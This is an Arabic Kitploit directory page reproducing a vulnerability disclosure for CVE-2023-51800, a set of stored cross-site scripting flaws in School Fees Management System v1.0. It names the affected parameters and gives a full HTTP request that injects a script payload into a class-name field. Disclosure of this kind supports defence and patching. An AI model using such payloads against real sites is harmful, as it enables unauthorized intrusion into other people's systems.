Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-51800 — ثغرات متعددة من نوع cross-site scripting (XSS) في School Fees Management System v1.0. | Kitploit
أدوات/GitHubGitHub/geraldoalcantara/cve-2023-51800
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubgeraldoalcantara/cve-2023-51800

CVE-2023-51800

ثغرات متعددة من نوع cross-site scripting (XSS) في School Fees Management System v1.0.

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-51800

نظام إدارة رسوم المدرسة v1.0 - ثغرات متعددة من نوع البرمجة النصية عبر المواقع (XSS)

الوصف: ثغرات متعددة من نوع البرمجة النصية عبر المواقع (XSS) في نظام إدارة رسوم المدرسة الإصدار v1.0.

إصدار المنتج المعرض للخطر: نظام إدارة رسوم المدرسة v1.0
مؤلف CVE: جيرالدو ألكانتارا
التاريخ: 28/11/2023
تم التأكيد في: 10/12/2023
CVE: CVE-2023-51800
رابط CVE: https://www.cve.org/CVERecord?id=CVE-2023-51800
رابط NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-51800
رابط Tenable: https://www.tenable.com/cve/CVE-2023-51800
تم الاختبار على: Windows

خطوات إعادة الإنتاج:

لاستغلال الثغرة، يحتاج المستخدم الموثّق الذي يمتلك الأذونات المطلوبة إلى الانتقال إلى أي من الصفحات المتأثرة وحقن حمولة ضارة في أحد الحقول القابلة للتأثر.
المكونات المتأثرة:

main_settings - معاملات phone, address, bank, acc_name, acc_number،
new_class - معامل cname،
add_new_parent - معاملات name, email،
new_term - معامل tname،
edit_student - معامل name

الطلب:

root@kitploit:~
Request:
POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close

------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"

<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"

12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--

المكتشفون/الاعتمادات:
جيرالدو ألكانتارا

تنزيل الأداة